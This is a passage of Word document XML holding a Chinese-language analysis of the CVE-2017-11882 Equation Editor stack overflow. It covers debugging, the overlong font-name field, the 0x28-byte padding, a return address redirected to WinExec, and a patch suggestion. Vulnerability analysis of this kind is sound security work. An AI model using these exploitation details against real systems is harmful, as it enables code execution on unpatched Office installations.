      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4，</w:t>
      </w:r>
      <w:r w:rsidR="001E4E32">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这时我们静态分析</w:t>
      </w:r>
      <w:r w:rsidR="001E4E32">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4115A7这个函数，其实就是对lpString进行了41160F函数的处理，我们在call 41160F的地方下断点，OD单步步过，计算器弹出了，说明漏洞其实就位于41160F中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D5305" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRDefault="00E563C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 wp14:anchorId="7682022E" wp14:editId="749A892E">
            <wp:extent cx="5274310" cy="26162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ED3C" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRDefault="00E563C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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5811E8" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRDefault="00E563C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静态分析可以看出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，漏洞位于strcpy(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&amp;v12,a1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)这行代码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3B58A" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRPr="00E563C4" w:rsidRDefault="00E563C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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trcpy没有对传入的a1参数长度进行校验，导致栈上的v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2产生溢出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，v12位于ebp-0x28处，只要填充0x28个字节，就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以覆盖保存的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ebp，进而改写eip，执行shellcode</w:t>
      </w:r>
      <w:r w:rsidR="009A770E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。返回地址已经被改为430c12，也就是call WinExec</w:t>
      </w:r>
      <w:r w:rsidR="007C4552">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009A770E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如图6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0C485B2F" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRPr="00E563C4" w:rsidRDefault="00E563C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678DAE42" wp14:editId="41630041">
            <wp:extent cx="3568883" cy="325771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CAB4" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRDefault="00E563C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图6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541330CF" w14:textId="77777777" w:rsidR="00D40C81" w:rsidRDefault="00D40C81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4451BB" w14:textId="77777777" w:rsidR="00DD5DB8" w:rsidRDefault="00EE617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公式</w:t>
      </w:r>
      <w:r w:rsidR="006674DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>编辑器OLE对象的</w:t>
      </w:r>
      <w:r w:rsidR="006674DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据结构是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B007FA5" w14:textId="77777777" w:rsidR="006674DD" w:rsidRDefault="00F1768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Stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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=</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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EQNOLEFILEHDR</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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+</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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MTEF data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2DE1F0" w14:textId="77777777" w:rsidR="00F1768C" w:rsidRDefault="00F1768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其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TEF data</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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=</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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MTEF header</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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+</w:t>
      </w:r>
      <w:r w:rsidR="00E078A9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MTEF byte stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44419DE9" w14:textId="77777777" w:rsidR="00AF65DF" w:rsidRDefault="00AF65DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2453D8CD" w14:textId="77777777" w:rsidR="00EC5BD5" w:rsidRPr="00F1768C" w:rsidRDefault="0094618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MTEF b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">yte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidR="004058B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="004058B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004058B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据类别为字体</w:t>
      </w:r>
      <w:r w:rsidR="00E750ED">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidR="004058B4"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 w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>font name字段</w:t>
      </w:r>
      <w:r w:rsidR="00F30FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>超长</w:t>
      </w:r>
      <w:r w:rsidR="00D20708">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F30FAC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>导致</w:t>
      </w:r>
      <w:r w:rsidR="00A27809">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>栈溢出</w:t>
      </w:r>
      <w:r w:rsidR="008F58AB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0EC31" w14:textId="77777777" w:rsidR="00336725" w:rsidRDefault="00336725">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0161E4BA" w14:textId="77777777" w:rsidR="00084059" w:rsidRPr="00084059" w:rsidRDefault="00084059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23906DA4" w14:textId="77777777" w:rsidR="00D40C81" w:rsidRDefault="00DD5DB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下图是网上公布的</w:t>
      </w:r>
      <w:r w:rsidR="006674DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C内部数据结构</w:t>
      </w:r>
      <w:r w:rsidR="00D320F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，与OllyDBG调试结果基本相符</w:t>
      </w:r>
      <w:r w:rsidR="00EC5BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CC1F38">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>其实</w:t>
      </w:r>
      <w:r w:rsidR="00EC5BD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改红框内的typeface number和style并不影响漏洞触发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76CAFDA6" w14:textId="77777777" w:rsidR="00D84E7C" w:rsidRDefault="00DD5DB8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0E0D9522" wp14:editId="3A1EF2D2">
            <wp:extent cx="5274310" cy="3533747"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="【漏洞分析】CVE-2017-11882漏洞分析、利用及动态检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【漏洞分析】CVE-2017-11882漏洞分析、利用及动态检测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C32C" w14:textId="77777777" w:rsidR="00ED66CF" w:rsidRDefault="00ED66CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B596CEF" w14:textId="77777777" w:rsidR="00ED66CF" w:rsidRDefault="00ED66CF" w:rsidP="00ED66CF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t>漏洞修补</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B519FE" w14:textId="77777777" w:rsidR="00ED66CF" w:rsidRPr="00D84E7C" w:rsidRDefault="00ED66CF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对于这个栈溢出漏洞，只需在strcpy前检测a1的长度，只有a1长度小于0x24才能进行字符串拷贝操作。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00ED66CF" w:rsidRPr="00D84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B54B5" w14:textId="77777777" w:rsidR="00235143" w:rsidRDefault="00235143" w:rsidP="00CF18F4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71D235EB" w14:textId="77777777" w:rsidR="00235143" w:rsidRDefault="00235143" w:rsidP="00CF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8BD00" w14:textId="77777777" w:rsidR="00235143" w:rsidRDefault="00235143" w:rsidP="00CF18F4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E5E61D7" w14:textId="77777777" w:rsidR="00235143" w:rsidRDefault="00235143" w:rsidP="00CF1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C37"/>
    <w:rsid w:val="00020E10"/>
    <w:rsid w:val="00084059"/>
    <w:rsid w:val="000A0E01"/>
    <w:rsid w:val="001814D4"/>
    <w:rsid w:val="001E4E32"/>
    <w:rsid w:val="00204087"/>
    <w:rsid w:val="00235143"/>
    <w:rsid w:val="002E54FC"/>
    <w:rsid w:val="00336725"/>
    <w:rsid w:val="003447DF"/>
    <w:rsid w:val="00373C37"/>
    <w:rsid w:val="0039683A"/>
    <w:rsid w:val="003B378D"/>
    <w:rsid w:val="004058B4"/>
    <w:rsid w:val="00465A91"/>
    <w:rsid w:val="00490448"/>
    <w:rsid w:val="00520822"/>
    <w:rsid w:val="00562109"/>
    <w:rsid w:val="00590483"/>
    <w:rsid w:val="005C32E0"/>
    <w:rsid w:val="005E6F68"/>
    <w:rsid w:val="0066205C"/>
    <w:rsid w:val="006674DD"/>
    <w:rsid w:val="006A673E"/>
    <w:rsid w:val="006C41EC"/>
    <w:rsid w:val="00757A9C"/>
    <w:rsid w:val="007C4552"/>
    <w:rsid w:val="007F1C95"/>
    <w:rsid w:val="00803F69"/>
    <w:rsid w:val="008462DE"/>
    <w:rsid w:val="00874029"/>
    <w:rsid w:val="008E26B7"/>
    <w:rsid w:val="008F58AB"/>
    <w:rsid w:val="00912852"/>
    <w:rsid w:val="0094618D"/>
    <w:rsid w:val="00981A5B"/>
    <w:rsid w:val="009A18F0"/>
    <w:rsid w:val="009A770E"/>
    <w:rsid w:val="00A0495A"/>
    <w:rsid w:val="00A27809"/>
    <w:rsid w:val="00A62409"/>
    <w:rsid w:val="00AB754A"/>
    <w:rsid w:val="00AF65DF"/>
    <w:rsid w:val="00AF75FA"/>
    <w:rsid w:val="00BA77F8"/>
    <w:rsid w:val="00BD1AA6"/>
    <w:rsid w:val="00BD7C68"/>
    <w:rsid w:val="00BE3328"/>
    <w:rsid w:val="00BF6AFD"/>
    <w:rsid w:val="00C0520D"/>
    <w:rsid w:val="00C07AEB"/>
    <w:rsid w:val="00C722D1"/>
    <w:rsid w:val="00CC1F38"/>
    <w:rsid w:val="00CF18F4"/>
    <w:rsid w:val="00D10E9F"/>
    <w:rsid w:val="00D16082"/>
    <w:rsid w:val="00D20708"/>
    <w:rsid w:val="00D320F3"/>
    <w:rsid w:val="00D40C81"/>
    <w:rsid w:val="00D42506"/>
    <w:rsid w:val="00D84E7C"/>
    <w:rsid w:val="00DD3D14"/>
    <w:rsid w:val="00DD5DB8"/>
    <w:rsid w:val="00DE167C"/>
    <w:rsid w:val="00DE5AE2"/>
    <w:rsid w:val="00DF75FD"/>
    <w:rsid w:val="00E078A9"/>
    <w:rsid w:val="00E415F0"/>
    <w:rsid w:val="00E525E4"/>
    <w:rsid w:val="00E563C4"/>
    <w:rsid w:val="00E750ED"/>
    <w:rsid w:val="00EB68F9"/>
    <w:rsid w:val="00EB7587"/>
    <w:rsid w:val="00EC5BD5"/>
    <w:rsid w:val="00ED66CF"/>
    <w:rsid w:val="00EE617D"/>
    <w:rsid w:val="00F02CB8"/>
    <w:rsid w:val="00F1768C"/>
    <w:rsid w:val="00F3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71E313"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4EACB2CC-740C-4FF0-8E63-A7313C44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B378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18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8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8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8F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B378D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3B37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6A67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6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sz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>h sz</cp:lastModifiedBy>
  <cp:revision>73</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-14T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-22T03:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>